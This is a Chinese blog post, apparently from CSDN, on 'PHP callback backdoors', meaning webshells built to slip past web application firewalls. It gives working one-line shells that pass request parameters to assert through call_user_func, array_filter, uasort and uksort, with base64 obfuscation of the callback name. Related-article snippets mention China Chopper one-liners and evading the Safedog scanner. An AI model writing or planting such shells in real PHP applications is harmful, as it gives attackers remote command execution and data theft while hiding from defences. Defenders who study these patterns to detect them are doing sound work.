PHP回调后门

最新推荐文章于 2024-08-17 22:56:29 发布
最新推荐文章于 2024-08-17 22:56:29 发布
阅读量342 收藏 4
点赞数 4
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71514466/article/details/141114371
版权

        PHP回调后门是指利用php回调函数等技巧绕过WAF的方法。    

        回调后门的原理是,攻击者在受攻击的PHP应用程序中插入恶意代码,该代码通过回调函数的触发来执行特定的操作。攻击者可以通过后门实现对数据库的访问、执行系统命令、窃取敏感信息等恶意行为。

1 .初始的回调后门

call_user_func('assert', $_REQUEST['pass']);

call_user_func — 把第一个参数作为回调函数调用 

assert — 检查一个断言是否为 false

assert作为回调函数,然后$_REQUEST['pass']作为assert的参数调用   

例:phpinfo 查看PHP环境信息

file_put_contents — 将一个字符串写入文件

2.数组操作造成的单参数回调后门

$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, base64_decode($e));

array — 新建一个数组

array_filter — 使用回调函数过滤数组的元素(这里采用了64位编码过滤)

 3.php5.4.8+中的assert

$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['pass']);
uasort($arr, base64_decode($e));

 uasort — 使用用户自定义的比较函数对数组中的值进行排序并保持索引关联

$e = $_REQUEST['e'];
$arr = array('test' => 1, $_REQUEST['pass'] => 2);
uksort($arr, $e);

uksort — 使用用户自定义的比较函数对数组中的键名进行排序

这个后门在php5.3时会报错,提示assert只能有一个参数,php版本改作5.4后就可以执行了

E.W.S.A.P.
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
bypass各种waf--php回调后门
qq_43710889的博客
08-15 340
文章目录bypass各种waf--php回调后门一般过狗思路双参数回调后门uasortarray_reducearray_udiff单参数后门终极奥义这个是php全版本支持的,且不报不杀稳定执行:再来一个:参考链接: bypass各种waf–php回调后门 一般过狗思路 call_user_func('assert', $_REQUEST['pass']) 双参数回调后门 uasort <?php $e=$_REQUEST['e']; $arr=array('test', $_REQUEST['p
php无eval后门1
08-03
PHP 无 eval 后门PHP 中的一种常见的后门技术,通过使用 eval 函数、assert 函数、create_function 函数、preg_replace 函数、mb_ereg_replace 函数、回调函数等方式来执行恶意代码。这些方法可以绕过一些安全...
PHP回调后门
feng的博客
10-17 993
前言 今天洪学长给我留个了任务,具体的就是关于回调后门这块的内容。我关于回调后门了解的很少很少,以前做南邮的题目遇到过一道三参数回调后门的题目,当时草草了解了一下,理解的不算很深。因此今天去学习了一下回调后门的相关内容。 PHP回调函数 什么是回调函数? 所谓的回调函数,就是指调用函数时并不是向函数中传递一个标准的变量作为参数,而是将另一个函数作为参数传递到调用的函数中,这个作为参数的函数就是回调函数。通俗的来说,回调函数也是一个我们定义的函数,但是不是我们直接来调用的,而是通过另一个函数来调用的,这个函
PHP回调函数--call_user_func_array
leo09999的博客
11-15 952
1. 全局函数的回调 这里的全局函数的意思,是直接使用function定义的函数,它不包含在任何对象或类之中。请看下面的例子 示例代码 public static function fnCallBack( $msg1 , $msg2 ) { echo 'msg1:'.$msg1; echo "<br />\n"; echo 'msg2:'.$msg2; } $f...
php回调后门,PHP 回调后门笔记
weixin_39997037的博客
03-28 85
php中 存在回调函数参数的函数,都有可能作为后门比如array_map , array_filter 这类数组操作的回调函数,但是在安全狗下会被杀掉但是uasort 这类函数不会被杀掉。php5.4.8之后的assert在5.4.8之后,assert函数由一个参数,变成了两个参数。增加了一个可选参数descrition:5.4.8增加了参数 description。 description 现...
php回调后门,8. php回调后门
weixin_28752627的博客
03-28 110
中国菜刀下载,基于原版中国菜刀优化版20160309.下载地址:China chopper下面是收集并整理的各种一句话,带使用方法:1.php用法:http://www.xxx.com/1.php菜刀连接用法:http://www.xxx.com/1.php密码:joker详解: assert,是php代码执行函数,与eval()有同样的功能,应为$array[],POST[]都是数组,所以$a...
PHP回调地址,PHP 回调后门笔记
weixin_33669766的博客
03-10 147
php中 存在回调函数参数的函数,都有可能作为后门比如array_map , array_filter 这类数组操作的回调函数,但是在安全狗下会被杀掉但是uasort 这类函数不会被杀掉。php5.4.8之后的assert在5.4.8之后,assert函数由一个参数,变成了两个参数。增加了一个可选参数descrition:5.4.8增加了参数 description。 description 现...
PHP 回调后门笔记
weixin_34007879的博客
05-16 119
php中 存在回调函数参数的函数,都有可能作为后门比如array_map , array_filter 这类数组操作的回调函数,但是在安全狗下会被杀掉但是uasort 这类函数不会被杀掉。php5.4.8之后的assert在5.4.8之后,assert函数由一个参数,变成了两个参数。增加了一个可选参数descrition:5.4.8 增加了参数 description。 d...
基于PHP的RIPro主题 (免授权修复后门完美版).zip
07-22
了解这些支付接口的API调用和回调机制是必要的。 6. **内容保护**:RIPro主题提供了多种方式来保护内容,比如密码保护、会员可见性设置等。这涉及到PHP的条件逻辑和页面渲染控制。 7. **SEO优化**:一个好的主题应...
彩虹易支付源码-正版无后门-可二次开发-PHP源码
11-18
在实际使用和开发过程中,你需要对PHP编程有基本了解,熟悉支付行业的基本流程和规范,如支付回调、交易状态跟踪等。同时,理解并正确配置SSL证书以保证交易数据的安全传输,以及遵守相关的法律法规,如《非金融机构...
ripro9.0修正升级版,无加密无后门,无需扩展(源码君亲测,修复易支付会员充值回调问题)虚拟机可用
04-24
支持最新的wordpress5.8.1版本,php版本最好是php7.4,在低版本的php下可能会报错 由于官方的ripro系列已经不更新了,所以本人就自己修复了ripro的几处小bug,使用起来更完善了。 本站这个ripro最大的优点就是全...
php马-bypass _ alin'Blog1
08-03
因此,本文提出使用可携带参数的PHP回调函数来创建难以检测的后门。例如,`register_shutdown_function`结合`assert`可以构造出一个隐秘的后门,但某些检测工具(如安全狗)仍能识别这类技巧。 0x03 回调函数与绕过...
RabbitMQ-消息队列之routing使用
龙哥·三年风水从2011年开始做IT工作,从ps画图到前端开发->后端开发->框架开发->业务架构设计及开发->业务需求整理、开发->技术经理->技术总监
08-17 317
RabbitMQ-消息队列之routing使用
多媒体技术及应用课程思政网站
m0_73706453的博客
08-15 619
在Internet高速发展的今天,我们生活的各个领域都涉及到计算机的应用,其中包括多媒体技术及应用课程思政网站的网络应用,在外国多媒体技术及应用课程思政已经是很普遍的方式,不过国内的多媒体技术及应用课程思政可能还处于起步阶段。多媒体技术及应用课程思政网站具有学习音频功能。多媒体技术及应用课程思政网站采用PHP语言,Thinkphp5框架,基于mysql开发,实现了首页、个人中心、学生管理、教师管理、课程分类管理、学习视频管理、学习课程管理、学习音频管理、课程笔记管理、反馈留言、系统管理等内容进行管理,本系
思科RIP动态路由配置3
2302_76730689的博客
08-14 677
路由信息协议(Routing Information Protocol,RIP)是应用较早、使用较普遍的动态路由协议,也是内部网关协议,由于RIP以跳数作为衡量路径的开销,且规定最大跳数为15,因此RIP在实际应用中是有一定限制的,通常适用于中小型的企业网络。Router-A(config-router)#network 网段!#9查看Switch-A、Router-A、Router-B的路由表。#3配置Router-A的名称及其接口IP地址。#7在Router-A上配置动态RIP。
wordpress网站“ERR_CONNECTION_REFUSED”错误
最新发布
xiaoyuya
08-17 263
wordpress网站“ERR_CONNECTION_REFUSED”错误,是一个常见的wordpress错误。通过以上步骤,你应该能够诊断并解决WordPress中的“ERR_CONNECTION_REFUSED”错误。例如,最新的WordPress可能不支持PHP5.2,必须升级到PHP5.5或更高版本。如果WordPress无法连接到数据库,也会导致类似的错误。如果你使用的是云服务器,可以尝试重启服务器来解决问题。如果连接没有问题,尝试重新启动路由器或重新连接网络。有时浏览器缓存可能导致连接问题。
PHP多项目多场景排队叫号系统源码
2401_84414018的博客
08-16 461
多项目多场景排队叫号系统的出现,不仅极大地改善了顾客的等待体验,也提升了服务机构的工作效率和管理水平。它让等待不再是一种负担,而是一种高效有序的享受。未来,随着技术的不断进步和应用场景的不断拓展,相信多项目多场景排队叫号系统将会为更多行业带来便捷和高效。让我们一起期待更加美好的智能服务时代吧!🚀🌟。
H5漂流瓶交友源码_社交漂流瓶H5源码
jiyc2008的博客
08-15 250
H5漂流瓶交友源码_社交漂流瓶H5源码
PHP无eval后门技巧解析
"这篇文章主要探讨了PHP中无eval的代码执行后门方法,包括assert、create_function、preg_replace以及mb_ereg_replace等函数的使用。虽然PHP 7对某些函数进行了限制,但仍然存在绕过的方式。" 在PHP中,进行任意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

E.W.S.A.P.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值